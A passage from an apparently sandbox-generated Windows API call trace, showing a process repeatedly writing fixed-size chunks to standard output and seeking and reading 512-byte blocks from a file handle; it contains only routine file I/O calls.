lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] GetFileType (hFile=0x4c) returned 0x1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] GetFileType (hFile=0x4c) returned 0x1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] GetFileType (hFile=0x4c) returned 0x1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, 
lpOverlapped=0x0) returned 1 [0092.765] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.765] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.765] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.765] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] GetFileType (hFile=0x4c) returned 0x1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] GetFileType (hFile=0x4c) returned 0x1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] GetFileType (hFile=0x4c) returned 0x1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] GetFileType (hFile=0x4c) returned 0x1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] GetFileType (hFile=0x4c) returned 0x1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] WriteFile (in: hFile=0x4c, 
lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] GetFileType (hFile=0x4c) returned 0x1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] GetFileType (hFile=0x4c) returned 0x1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] GetFileType (hFile=0x4c) returned 0x1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.766] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.766] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] GetFileType (hFile=0x4c) returned 0x1 [0092.766] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0092.766] GetFileType (hFile=0x4c) returned 0x1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] GetFileType (hFile=0x4c) returned 0x1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] GetFileType (hFile=0x4c) returned 0x1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] GetFileType (hFile=0x4c) returned 0x1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] GetFileType (hFile=0x4c) returned 0x1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0092.766] GetFileType (hFile=0x4c) returned 0x1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] GetFileType (hFile=0x4c) returned 0x1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.767] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.767] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.767] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.767] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] GetFileType (hFile=0x4c) returned 0x1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] GetFileType (hFile=0x4c) returned 0x1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] GetFileType (hFile=0x4c) returned 0x1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, 
lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] GetFileType (hFile=0x4c) returned 0x1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] GetFileType (hFile=0x4c) returned 0x1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.768] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.768] GetFileType (hFile=0x4c) returned 0x1 [0092.768] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.768] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.768] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.768] GetFileType (hFile=0x4c) returned 0x1 [0092.768] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.768] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.768] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.768] GetFileType (hFile=0x4c) returned 0x1 [0092.768] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.768] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: 
lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.768] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.768] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.768] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.768] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.768] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.768] GetFileType (hFile=0x4c) returned 0x1 [0092.769] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.769] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.769] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.769] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.769] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.769] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.769] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.769] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.769] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.769] 
SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.769] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.769] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.769] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.769] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.769] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.769] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.769] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.769] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.769] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.769] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.769] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.770] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.770] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.770] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.770] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.770] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.770] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.770] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.770] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.770] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.770] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.771] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.771] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.771] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.771] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.771] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.771] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.771] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.771] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.771] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.771] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.771] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.771] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.771] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.771] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.771] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.771] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.771] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.771] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.771] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.771] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, 
lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.771] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.772] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.772] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.772] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.772] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.772] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.772] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.772] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.772] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.772] _get_osfhandle (_FileHandle=4) returned 0x54 
[0092.772] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.772] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.772] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.772] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.772] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.772] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.773] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.773] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.773] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.773] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.773] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.773] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.773] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.773] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.773] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.773] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.773] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.773] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.773] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.773] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.773] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.773] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.773] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, 